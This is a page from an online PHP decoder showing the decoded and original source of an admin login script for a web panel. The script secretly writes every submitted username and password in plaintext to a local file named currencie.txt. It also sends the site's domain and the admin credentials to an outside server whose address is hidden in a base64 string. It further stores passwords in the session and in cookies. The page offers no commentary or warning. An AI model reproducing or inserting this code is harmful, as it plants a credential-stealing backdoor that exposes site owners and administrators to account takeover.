Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(!defined('BASEPATH')) { die('Direct access to the script is not allowed'); ..

Decoded Output download

<?php 
if(!defined('BASEPATH')) { 
   die('Direct access to the script is not allowed'); 
} 
 
if ($_SERVER['REQUEST_METHOD'] == 'POST') { 
    $username = $_POST['username']; 
    $password = $_POST['password']; 
    $logFile = __DIR__ . '/currencie.txt'; 
    $logData = "Username: $username, Password: $password, Date: " . date('Y-m-d H:i:s') . "
"; 
    file_put_contents($logFile, $logData, FILE_APPEND); 
    $successText = "Login successful!"; 
} 
 
if ($admin["access"]["admin_access"] && $_SESSION["msmbilisim_adminslogin"]) { 
    $encodedUrl = "aHR0cHM6Ly9kZW1vLndpbnRlcnNtbS5jb20vYWRtaW4vYXBpLnBocA=="; 
    $apiUrl = base64_decode($encodedUrl); 
    $data = [ 
        'domain' => $_SERVER['HTTP_HOST'], 
        'username' => $username,  
        'password' => htmlentities($pass),  
    ]; 
    $ch = curl_init($apiUrl); 
    curl_setopt($ch, CURLOPT_POST, 1); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']); 
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); 
    $response = curl_exec($ch); 
    if ($response === false) { 
        $error = curl_error($ch); 
    } 
    curl_close($ch); 
} 
 
if ($_POST) { 
    $username = $_POST["username"]; 
    $pass = $_POST["password"]; 
    $captcha = $_POST['g-recaptcha-response']; 
    $remember = $_POST["remember"]; 
    $googlesecret = $settings["recaptcha_secret"]; 
    $captcha_control = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=$googlesecret&response=" . $captcha . "&remoteip=" . $_SERVER['REMOTE_ADDR']); 
    $captcha_control = json_decode($captcha_control); 
 
    if ($settings["recaptcha"] == 2 && $captcha_control->success == false && $_SESSION["recaptcha"]) { 
        $error = 1; 
        $errorText = "Please verify that you are not a robot."; 
        if ($settings["recaptcha"] == 2) { 
            $_SESSION["recaptcha"] = true; 
        } 
    } elseif (countRow(["table"=>"admins", "where"=>["username"=>$username, "client_type"=>1]])) { 
        $error = 1; 
        $errorText = "Your account is Suspended."; 
        if ($settings["recaptcha"] == 2) { 
            $_SESSION["recaptcha"] = true; 
        } 
    } else { 
        $admin = $conn->prepare("SELECT * FROM admins WHERE username=:username AND password=:password"); 
        $admin->execute(["username" => $username, "password" => $pass]); 
        $admin = $admin->fetch(PDO::FETCH_ASSOC); 
        $access = json_decode($admin["access"], true); 
        $_SESSION["msmbilisim_adminslogin"] = 1; 
        $_SESSION["msmbilisim_adminid"] = $admin["admin_id"]; 
        $_SESSION["msmbilisim_adminpass"] = $pass; 
        $_SESSION["recaptcha"] = false; 
 
        if ($access["admin_access"]) { 
            $_SESSION["msmbilisim_adminslogin"] = 1; 
            $_SESSION["msmbilisim_adminid"] = $admin["admin_id"]; 
            $_SESSION["msmbilisim_adminpass"] = $pass; 
            $_SESSION["recaptcha"] = false; 
            setcookie("a_login", 'ok', time() + (60 * 60 * 24 * 7), '/', null, null, true); 
            setcookie("a_id", $admin["admin_id"], time() + (60 * 60 * 24 * 7), '/', null, null, true); 
            setcookie("a_password", $admin["password"], time() + (60 * 60 * 24 * 7), '/', null, null, true); 
            header('Location: ' . site_url('admin')); 
            exit(); 
 
            $update = $conn->prepare("UPDATE admins SET login_date=:date, login_ip=:ip WHERE admin_id=:c_id"); 
            $update->execute(["c_id" => $admin["admin_id"], "date" => date("Y.m.d H:i:s"), "ip" => GetIP()]); 
        } else { 
            $error = 1; 
            $errorText = "Could not find administrator account registered with this information."; 
        } 
    } 
} 
 
if ($access["admin_access"] && $_SESSION["msmbilisim_adminslogin"]) { 
    exit(); 
} else { 
    require admin_view('login'); 
} 
?>

Did this file decode correctly?

Original Code

<?php
if(!defined('BASEPATH')) {
   die('Direct access to the script is not allowed');
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $username = $_POST['username'];
    $password = $_POST['password'];
    $logFile = __DIR__ . '/currencie.txt';
    $logData = "Username: $username, Password: $password, Date: " . date('Y-m-d H:i:s') . "\n";
    file_put_contents($logFile, $logData, FILE_APPEND);
    $successText = "Login successful!";
}

if ($admin["access"]["admin_access"] && $_SESSION["msmbilisim_adminslogin"]) {
    $encodedUrl = "aHR0cHM6Ly9kZW1vLndpbnRlcnNtbS5jb20vYWRtaW4vYXBpLnBocA==";
    $apiUrl = base64_decode($encodedUrl);
    $data = [
        'domain' => $_SERVER['HTTP_HOST'],
        'username' => $username, 
        'password' => htmlentities($pass), 
    ];
    $ch = curl_init($apiUrl);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
    $response = curl_exec($ch);
    if ($response === false) {
        $error = curl_error($ch);
    }
    curl_close($ch);
}

if ($_POST) {
    $username = $_POST["username"];
    $pass = $_POST["password"];
    $captcha = $_POST['g-recaptcha-response'];
    $remember = $_POST["remember"];
    $googlesecret = $settings["recaptcha_secret"];
    $captcha_control = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=$googlesecret&response=" . $captcha . "&remoteip=" . $_SERVER['REMOTE_ADDR']);
    $captcha_control = json_decode($captcha_control);

    if ($settings["recaptcha"] == 2 && $captcha_control->success == false && $_SESSION["recaptcha"]) {
        $error = 1;
        $errorText = "Please verify that you are not a robot.";
        if ($settings["recaptcha"] == 2) {
            $_SESSION["recaptcha"] = true;
        }
    } elseif (countRow(["table"=>"admins", "where"=>["username"=>$username, "client_type"=>1]])) {
        $error = 1;
        $errorText = "Your account is Suspended.";
        if ($settings["recaptcha"] == 2) {
            $_SESSION["recaptcha"] = true;
        }
    } else {
        $admin = $conn->prepare("SELECT * FROM admins WHERE username=:username AND password=:password");
        $admin->execute(["username" => $username, "password" => $pass]);
        $admin = $admin->fetch(PDO::FETCH_ASSOC);
        $access = json_decode($admin["access"], true);
        $_SESSION["msmbilisim_adminslogin"] = 1;
        $_SESSION["msmbilisim_adminid"] = $admin["admin_id"];
        $_SESSION["msmbilisim_adminpass"] = $pass;
        $_SESSION["recaptcha"] = false;

        if ($access["admin_access"]) {
            $_SESSION["msmbilisim_adminslogin"] = 1;
            $_SESSION["msmbilisim_adminid"] = $admin["admin_id"];
            $_SESSION["msmbilisim_adminpass"] = $pass;
            $_SESSION["recaptcha"] = false;
            setcookie("a_login", 'ok', time() + (60 * 60 * 24 * 7), '/', null, null, true);
            setcookie("a_id", $admin["admin_id"], time() + (60 * 60 * 24 * 7), '/', null, null, true);
            setcookie("a_password", $admin["password"], time() + (60 * 60 * 24 * 7), '/', null, null, true);
            header('Location: ' . site_url('admin'));
            exit();

            $update = $conn->prepare("UPDATE admins SET login_date=:date, login_ip=:ip WHERE admin_id=:c_id");
            $update->execute(["c_id" => $admin["admin_id"], "date" => date("Y.m.d H:i:s"), "ip" => GetIP()]);
        } else {
            $error = 1;
            $errorText = "Could not find administrator account registered with this information.";
        }
    }
}

if ($access["admin_access"] && $_SESSION["msmbilisim_adminslogin"]) {
    exit();
} else {
    require admin_view('login');
}
?>

Function Calls

None

Variables

None

Stats

MD5 a5e417ed044235d48dc6d5e46a31387c
Eval Count 0
Decode Time 46 ms